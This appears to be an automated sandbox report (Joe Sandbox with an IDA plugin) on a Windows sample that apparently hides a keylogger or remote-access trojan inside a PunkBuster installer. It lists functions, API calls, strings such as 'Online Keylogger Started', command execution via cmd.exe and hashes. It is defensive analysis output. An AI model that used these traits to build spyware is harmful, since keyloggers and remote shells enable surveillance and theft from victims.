                                              • _free.LIBCMT ref: 0010F7EB
                                              • _free.LIBCMT ref: 0010F7FD
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 0606653dd7625bd154aa5012d0b3e1ff77958d4383ac7ace35bf7d08ecbd05a1
                                              • Instruction ID: 8008e00f4ef4795b3c16785a84c8f53c2e92fbf170f8b021ac5b058c5dd45c8f
                                              • Opcode Fuzzy Hash: 0606653dd7625bd154aa5012d0b3e1ff77958d4383ac7ace35bf7d08ecbd05a1
                                              • Instruction Fuzzy Hash: 75F01232904604BBC671EB58E8C6C5673E9AB54720768481DF484E7D85CBB0FCD18A50
                                              Function 001032E7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00103305
                                                • Part of subcall function 00106AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?), ref: 00106ADB
                                                • Part of subcall function 00106AC5: GetLastError.KERNEL32(?,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?,?), ref: 00106AED
                                              • _free.LIBCMT ref: 00103317
                                              • _free.LIBCMT ref: 0010332A
                                              • _free.LIBCMT ref: 0010333B
                                              • _free.LIBCMT ref: 0010334C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 94681616cd34c8b7bfffe975d7b014544dd8ec4ff7fb20f1c9c0f42bf963fd55
                                              • Instruction ID: 03ac597a1d2282ba5479ac0d1543786ca169717b43dfe7d0f5042771d2a1fcdc
                                              • Opcode Fuzzy Hash: 94681616cd34c8b7bfffe975d7b014544dd8ec4ff7fb20f1c9c0f42bf963fd55
                                              • Instruction Fuzzy Hash: 66F05E70D06264FBDB02BF14BD415883FA4B7587613050106F89567EBAEB7419E5EB81
                                              Function 0040D2B8 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 272COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040D2BD
                                                • Part of subcall function 0040906B: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,0040D2D4,64-bit,00000000), ref: 004090A6
                                                • Part of subcall function 0040906B: CheckTokenMembership.ADVAPI32(00000000,?,0040D2D4,?,0040D2D4,64-bit,00000000,00000000), ref: 004090BB
                                                • Part of subcall function 0040906B: FreeSid.ADVAPI32(?,?,0040D2D4,64-bit,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004090CB
                                              Strings
                                              • Message, xrefs: 0040D2E5
                                              • 64-bit, xrefs: 0040D2C9
                                              • **ERROR: Since this program needs to install a system service, it must be run as Administrator. If you need assistance with this, please visit our FAQ page at: http://www.evenbalance.com/index.php?page=pbsvcfaq.php, xrefs: 0040D2F2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: AllocateCheckFreeH_prologInitializeMembershipToken
                                              • String ID: **ERROR: Since this program needs to install a system service, it must be run as Administrator. If you need assistance with this, please visit our FAQ page at: http://www.evenbalance.com/index.php?page=pbsvcfaq.php$64-bit$Message
                                              • API String ID: 823383314-662163179
                                              • Opcode ID: d7a69150156cd50d1c04ccd039bb8ec0c02a260cf596ffd9b276cb661914f2ea
                                              • Instruction ID: 480cf2e0fd4845596181bfe692aa14e385947aba559717c7c60188e3466bd68c
                                              • Opcode Fuzzy Hash: d7a69150156cd50d1c04ccd039bb8ec0c02a260cf596ffd9b276cb661914f2ea
                                              • Instruction Fuzzy Hash: 6EC16D70A00245DFDB10DFA4C888BEEBBE1AF49304F5444BEE84AAB3D2CB795945CB55
                                              Function 000D29AA Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 000D2A1D
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 000D2A4C
                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 000D2AED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Enum$InfoQueryValue
                                              • String ID: [regsplt]
                                              • API String ID: 3554306468-4262303796
                                              • Opcode ID: a458f9a301647d3b360919554567bbc0f268490c3ee84a84c83fa872f5d985d5
                                              • Instruction ID: 855c5bd3e2260eb085a7f9407f56ca6385880068595b1b7805ea92289b016d64
                                              • Opcode Fuzzy Hash: a458f9a301647d3b360919554567bbc0f268490c3ee84a84c83fa872f5d985d5
                                              • Instruction Fuzzy Hash: F9510C72108345AFD314EB60D895EEFB7ECEF95700F40492EB596D2152EB70EA098B62
                                              Function 0010D459 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                              Download Yara Rule
                                              APIs
                                              • _strpbrk.LIBCMT ref: 0010D4A8
                                              • _free.LIBCMT ref: 0010D5C5
                                                • Part of subcall function 000FA854: IsProcessorFeaturePresent.KERNEL32(00000017,000FA826,000F4403,?,?,?,000F4403,00000016,?,?,000FA833,00000000,00000000,00000000,00000000,00000000), ref: 000FA856
                                                • Part of subcall function 000FA854: GetCurrentProcess.KERNEL32(C0000417,?,000F4403), ref: 000FA878
                                                • Part of subcall function 000FA854: TerminateProcess.KERNEL32(00000000,?,000F4403), ref: 000FA87F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                              • String ID: *?$.
                                              • API String ID: 2812119850-3972193922
                                              • Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                              • Instruction ID: c4019d36bee262a1fbdda54f54d14529c67c758598867897d7f2eb8b0d331b0e
                                              • Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                                              • Instruction Fuzzy Hash: 1251B171E00209AFDF14DFA8D881AADB7B5FF58314F25816AE894E7381E7B59A018B50
                                              Function 001026D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\4wECQoBvYC.exe,00000104), ref: 00102714
                                              • _free.LIBCMT ref: 001027DF
                                              • _free.LIBCMT ref: 001027E9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$FileModuleName
                                              • String ID: C:\Users\user\Desktop\4wECQoBvYC.exe
                                              • API String ID: 2506810119-4277792811
                                              • Opcode ID: 19a5fe7dd39da4a5ad413ab156aeb9fda98ad60691beab32416d80d2f3f0b5a0
                                              • Instruction ID: c5ab787550a942712ae1e92dd766688e82af076659ba42cf9a5b783ef35c1f2e
                                              • Opcode Fuzzy Hash: 19a5fe7dd39da4a5ad413ab156aeb9fda98ad60691beab32416d80d2f3f0b5a0
                                              • Instruction Fuzzy Hash: A2319271A00248BFDB21DF99DC89D9EBBFCEBA5310F144066F944A7291D7F08A81DB51
                                              Function 0040631D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00406322
                                              • CoCreateInstance.OLE32(004E8254,00000000,00000001,004E8264,?), ref: 0040634B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: CreateH_prologInstance
                                              • String ID: Message$get_LocalPolicy failed: 0x%08lx
                                              • API String ID: 457505298-1432678775
                                              • Opcode ID: ae59d5c511ced1d424170903cafecce15efe742eec3dbc4535d189b62bf81f0b
                                              • Instruction ID: 249664490226cffe886a95c969e3a1f1bb7c66dd1e282c0fdea98710dae82b57
                                              • Opcode Fuzzy Hash: ae59d5c511ced1d424170903cafecce15efe742eec3dbc4535d189b62bf81f0b
                                              • Instruction Fuzzy Hash: F231C270900259AFCB00DF95C8C5EAEB7B8AF44314F10456EF916E72D1C7749E45CBA5
                                              Function 004070CD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004070D2
                                                • Part of subcall function 00406A55: __EH_prolog.LIBCMT ref: 00406A5A
                                                • Part of subcall function 0040A632: __EH_prolog.LIBCMT ref: 0040A637
                                              Strings
                                              • Battlefield Bad Company 2, xrefs: 00407193
                                              • frame, xrefs: 004070E6
                                              • PunkBuster Service Setup v%d.%d %s - Step 1 of 3, xrefs: 004071A4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Battlefield Bad Company 2$PunkBuster Service Setup v%d.%d %s - Step 1 of 3$frame
                                              • API String ID: 3519838083-515625952
                                              • Opcode ID: cdc1f6182bd214d9045f9556bf90022187fa22f43cd70c14b82050586f43efeb
                                              • Instruction ID: b6a62f28c7b3057c80a3f56269876836a777f19cbbca4682d8e1b937b331a87d
                                              • Opcode Fuzzy Hash: cdc1f6182bd214d9045f9556bf90022187fa22f43cd70c14b82050586f43efeb
                                              • Instruction Fuzzy Hash: 1C31B670900288DFCB01DF64CC50BDEBBB4AF15304F1084BFE559A3291DB785A44CB69
                                              Function 000CA611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000CA876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 000CA884
                                                • Part of subcall function 000CA876: wsprintfW.USER32 ref: 000CA905
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 000CA691
                                              • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 000CA69D
                                              • CreateThread.KERNEL32(00000000,00000000,000C99C1,?,00000000,00000000), ref: 000CA6A9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread$LocalTime$wsprintf
                                              • String ID: Online Keylogger Started
                                              • API String ID: 112202259-1258561607
                                              • Opcode ID: 166964d058b5de3d6ab50a6731417b682c72f6fc1c5cb00c9871afe597a29581
                                              • Instruction ID: ba081289d19e992492ac7536f5ee57a9480e753d13d042b58bdacf59c3593b73
                                              • Opcode Fuzzy Hash: 166964d058b5de3d6ab50a6731417b682c72f6fc1c5cb00c9871afe597a29581
                                              • Instruction Fuzzy Hash: 6B0196A17002187EE72077789CCBEFF7E6DCB833A8B44042DF54126583D9645D4682F2
                                              Function 000C4B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,000C4B26), ref: 000C4B40
                                              • CloseHandle.KERNEL32(?,?,?,?,000C4B26), ref: 000C4B98
                                              • SetEvent.KERNEL32(?,?,?,?,000C4B26), ref: 000C4BA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventHandleObjectSingleWait
                                              • String ID: Connection Timeout
                                              • API String ID: 2055531096-499159329
                                              • Opcode ID: 0286a41e0ad2f0dfa9e151531e2a8048e0b45e297ed5f18f3ef8718604b9ef98
                                              • Instruction ID: cdb5484681c9ae2a526f0c57e5757bcafe81be04be7219c3f973349f0905d243
                                              • Opcode Fuzzy Hash: 0286a41e0ad2f0dfa9e151531e2a8048e0b45e297ed5f18f3ef8718604b9ef98
                                              • Instruction Fuzzy Hash: FF012431A44B40EFD325AB398CA6A9EBFE5BF02310300092DF19342BA2CB30D8418B52
                                              Function 00409783 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • PunkBuster Service Setup v%d.%d %s - Step 1 of 2, xrefs: 004097C9
                                              • Battlefield Bad Company 2, xrefs: 004097AC
                                              • PunkBuster Service Setup v%d.%d %s- Step 1 of 3, xrefs: 004097C2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Battlefield Bad Company 2$PunkBuster Service Setup v%d.%d %s - Step 1 of 2$PunkBuster Service Setup v%d.%d %s- Step 1 of 3
                                              • API String ID: 3519838083-2774316313
                                              • Opcode ID: 3eed306f2d1d9ac54f449b40445fcb4ccd03e3b679d1554b8b83fbbae08ab14b
                                              • Instruction ID: a3b6ba2b4f641e5437b8940605f5d530bd99bbe82a93198287cab800592f0113
                                              • Opcode Fuzzy Hash: 3eed306f2d1d9ac54f449b40445fcb4ccd03e3b679d1554b8b83fbbae08ab14b
                                              • Instruction Fuzzy Hash: 48118EB0900208DFC700EB54C885FE973B4BB14704F0081BEA605A72E2DB785A85CB59
                                              Function 000C64D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                              Download Yara Rule
                                              Strings
                                              • C:\Users\user\Desktop\4wECQoBvYC.exe, xrefs: 000C6927
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: C:\Users\user\Desktop\4wECQoBvYC.exe
                                              • API String ID: 0-4277792811
                                              • Opcode ID: 405257ec5948d270ccf5aa2f618fd2f8207e940d7338a48b6f9b02644a77fbb5
                                              • Instruction ID: e9c21ecf5376a299c0a8eb8803bd1ca6ecdc64701c40f6c7eb263272f86cfcc5
                                              • Opcode Fuzzy Hash: 405257ec5948d270ccf5aa2f618fd2f8207e940d7338a48b6f9b02644a77fbb5
                                              • Instruction Fuzzy Hash: 5EF0BB30741210ABDF2427747D29FBE3A9AE745356F004579F445E7A92DB3248818751
                                              Function 000D2774 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegCreateKeyW.ADVAPI32(80000001,00000000,001342E0), ref: 000D277F
                                              • RegSetValueExW.ADVAPI32(001342E0,?,00000000,00000001,00000000,00000000,001342F8,?,000CE5CB,pth_unenc,001342E0), ref: 000D27AD
                                              • RegCloseKey.ADVAPI32(001342E0,?,000CE5CB,pth_unenc,001342E0), ref: 000D27B8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateValue
                                              • String ID: pth_unenc
                                              • API String ID: 1818849710-4028850238
                                              • Opcode ID: b0bf42da2bfcdbd5c9257ccbc8694f8642264dadb5db9879a04d2af2a17f25b6
                                              • Instruction ID: 08212ba28bc33e4a1178e1213bbb0b3e2f47fbc3a14523fd53218c8e1d8f0598
                                              • Opcode Fuzzy Hash: b0bf42da2bfcdbd5c9257ccbc8694f8642264dadb5db9879a04d2af2a17f25b6
                                              • Instruction Fuzzy Hash: BEF09071504218BBDF249FB0EE46FEE377CEF45750F108515F90296292E7719B04EA60
                                              Function 000CCDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                              Download Yara Rule
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 000CCDC9
                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000CCE08
                                                • Part of subcall function 000F47BD: _Yarn.LIBCPMT ref: 000F47DC
                                                • Part of subcall function 000F47BD: _Yarn.LIBCPMT ref: 000F4800
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 000CCE2C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                              • String ID: bad locale name
                                              • API String ID: 3628047217-1405518554
                                              • Opcode ID: 207606ab9a4460380bf89e98b650284f602a890750af5e823eae6b6b3c51c440
                                              • Instruction ID: 6744b1505d92af0444704295074146fd903fc8c648f3e2de8f9a39f6adfa1dcd
                                              • Opcode Fuzzy Hash: 207606ab9a4460380bf89e98b650284f602a890750af5e823eae6b6b3c51c440
                                              • Instruction Fuzzy Hash: 0CF04F31400249EAC728FB20E857FDE77A4DF16750B90452CF506524E3EF30AA08C694
                                              Function 004C318C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37threadCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,00000000,004BF718,004C27EB,00000000,0050F518,00000008,004C2842,?,?,?,004BD45A,00000004,0050EE80,0000000C,004BD4BE), ref: 004C318E
                                              • SetLastError.KERNEL32(00000000,?,?,?,0048B8FF,?,?,?,?,?,00401022,?,00000000), ref: 004C31F2
                                                • Part of subcall function 004BDC28: __lock.LIBCMT ref: 004BDC6C
                                                • Part of subcall function 004BDC28: HeapAlloc.KERNEL32(00000008,?,0050EEB0,00000010,004C31B4,00000001,0000008C,?,?,?,0048B8FF,?), ref: 004BDCAA
                                              • GetCurrentThreadId.KERNEL32 ref: 004C31DB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: ErrorLast$AllocCurrentHeapThread__lock
                                              • String ID: pl
                                              • API String ID: 702879602-1786839575
                                              • Opcode ID: cb88780e55af28360521e8d65bb42ce1b6262d24d1d92811166b2b08986586a4
                                              • Instruction ID: 4e15fead1da765310891571215d60c9e77c149a2e6dfa2c0e8c96e45c1ec75c6
                                              • Opcode Fuzzy Hash: cb88780e55af28360521e8d65bb42ce1b6262d24d1d92811166b2b08986586a4
                                              • Instruction Fuzzy Hash: 38F0C835601751DFEB201F70AC49F563AA5EF04762B04462EF8429A2B1DF7989408B94
                                              Function 004CA431 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00511168,00000010,004C27DA,00000000,00000FA0,0050F518,00000008,004C2842,?,?,?,004BD45A,00000004,0050EE80,0000000C), ref: 004CA454
                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 004CA464
                                              Strings
                                              • kernel32.dll, xrefs: 004CA44F
                                              • InitializeCriticalSectionAndSpinCount, xrefs: 004CA45E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                              • API String ID: 1646373207-3733552308
                                              • Opcode ID: 73cf7e5df0098c1c7d62d08b5aa5e6f9ae56e660d87144e9d257d9a9c70f2567
                                              • Instruction ID: e39fc0700cef1ff0848360b4e5987c70e5a34b69ece04a98e9f0bb628ab4d806
                                              • Opcode Fuzzy Hash: 73cf7e5df0098c1c7d62d08b5aa5e6f9ae56e660d87144e9d257d9a9c70f2567
                                              • Instruction Fuzzy Hash: 96F02438540789ABDB049FA4EC49B8D3AA1BB0070CB40826AE812D91A0E7B88590CB1E
                                              Function 000D51B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                              Download Yara Rule
                                              APIs
                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 000D51F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExecuteShell
                                              • String ID: /C $cmd.exe$open
                                              • API String ID: 587946157-3896048727
                                              • Opcode ID: 39d4f960c4016b566d16a7f2a9497764bd7da49fa2d34244112897ccda02c51d
